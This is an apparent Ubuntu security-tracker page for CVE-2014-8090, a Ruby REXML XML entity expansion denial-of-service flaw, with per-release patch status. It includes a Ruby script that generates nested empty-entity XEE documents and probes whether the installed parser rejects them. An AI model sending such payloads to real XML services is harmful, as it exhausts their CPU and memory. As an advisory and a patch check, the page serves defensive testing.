
CVE-2014-8090

Published: 14 November 2014

The REXML parser in Ruby 1.9.x before 1.9.3 patchlevel 551, 2.0.x before 2.0.0 patchlevel 598, and 2.1.x before 2.1.5 allows remote attackers to cause a denial of service (CPU and memory consumption) via a crafted XML document containing an empty string in an entity that is used in a large number of nested entity references, aka an XML Entity Expansion (XEE) attack. NOTE: this vulnerability exists because of an incomplete fix for CVE-2013-1821 and CVE-2014-8080.
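The shape of document the description refers to is easy to miss: because the innermost entity is the empty string, the expanded text never grows, so a limit on expanded text size (REXML's entity_expansion_text_limit) never fires and only a limit on the number of expansions (REXML::Security.entity_expansion_limit, default 10000; REXML::Document.entity_expansion_limit on the older 1.9.3/2.0 lines) can stop the work. The Ruby below is an added example, not code from this advisory or from Ruby/REXML: it constructs such a document, computes how many expansions resolving it costs, and probes whatever REXML is installed. The names xee_payload, expected_expansions and probe and the width/depth parameters are the example's own.

```ruby
require 'rexml/document'

# Constructed XEE document of the shape the advisory describes: e0 expands to
# the empty string, and each e(i) is `width` references to e(i-1), nested
# `depth` levels deep. Every expansion yields zero bytes, so a byte-size limit
# on expanded text never trips; only a count of expansions can.
def xee_payload(width: 40, depth: 3)
  decls = ['<!ENTITY e0 "">']
  (1..depth).each do |i|
    refs = "&e#{i - 1};" * width
    decls << %(<!ENTITY e#{i} "#{refs}">)
  end
  <<~XML
    <?xml version="1.0"?>
    <!DOCTYPE x [
    #{decls.join("\n")}
    ]>
    <x>&e#{depth};</x>
  XML
end

# Entity expansions needed to resolve &e(depth);: one for e(depth), then
# width for e(depth-1), ..., width**depth for e0.
def expected_expansions(width:, depth:)
  (0..depth).sum { |i| width**i }
end

# Parse the document and force expansion of the root element's text. REXML
# expands lazily, so the cost is paid when #text is read, not at parse time.
# A fixed REXML raises a RuntimeError once the expansion count passes
# REXML::Security.entity_expansion_limit even though no text has grown.
def probe(xml)
  doc = REXML::Document.new(xml)
  { status: :expanded, text: doc.root.text }
rescue RuntimeError => e
  { status: :rejected, error: e.message }
end

if $PROGRAM_NAME == __FILE__
  puts "entity_expansion_limit: #{REXML::Security.entity_expansion_limit}"
  [[3, 2], [40, 3]].each do |width, depth|
    r = probe(xee_payload(width: width, depth: depth))
    n = expected_expansions(width: width, depth: depth)
    puts "width=#{width} depth=#{depth} expansions=#{n} -> #{r}"
  end
end
```

The small case (3 wide, 2 deep, 13 expansions) resolves to an empty string as a legitimate document would; the 40-by-3 case needs 65641 expansions of nothing, which a fixed parser refuses and an unfixed one grinds through.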

Priority

Medium

Status

Package Release Status

ruby1.8 (Launchpad, Ubuntu, Debian)
  lucid     Ignored (reached end-of-life)
  precise   Released (1.8.7.352-2ubuntu1.6)
  trusty    Does not exist
  upstream  Needs triage
  utopic    Does not exist
  vivid     Does not exist
  wily      Does not exist

ruby1.9.1 (Launchpad, Ubuntu, Debian)
  lucid     Ignored (reached end-of-life)
  precise   Released (1.9.3.0-1ubuntu2.10)
  trusty    Does not exist (trusty was released [1.9.3.484-2ubuntu1.2])
  upstream  Needs triage
  utopic    Ignored (reached end-of-life)
  vivid     Ignored (reached end-of-life)
  wily      Does not exist
  Patches:
    upstream: http://svn.ruby-lang.org/cgi-bin/viewvc.cgi?view=revision&revision=48406 (1.9.3)

ruby2.0 (Launchpad, Ubuntu, Debian)
  lucid     Does not exist
  precise   Does not exist
  trusty    Does not exist (trusty was released [2.0.0.484-1ubuntu2.2])
  upstream  Needs triage
  utopic    Released (2.0.0.484+really457-3ubuntu1.2)
  vivid     Does not exist
  wily      Does not exist
  Patches:
    upstream: http://svn.ruby-lang.org/cgi-bin/viewvc.cgi?view=revision&revision=48403 (2.0)

ruby2.1 (Launchpad, Ubuntu, Debian)
  lucid     Does not exist
  precise   Does not exist
  trusty    Does not exist
  upstream  Needs triage
  utopic    Released (2.1.2-2ubuntu1.2)
  vivid     Released (2.1.2-2ubuntu3)
  wily      Released (2.1.2-2ubuntu3)
  Patches:
    upstream: http://svn.ruby-lang.org/cgi-bin/viewvc.cgi?view=revision&revision=48402 (trunk)
    upstream: http://svn.ruby-lang.org/cgi-bin/viewvc.cgi?view=revision&revision=48404 (2.1)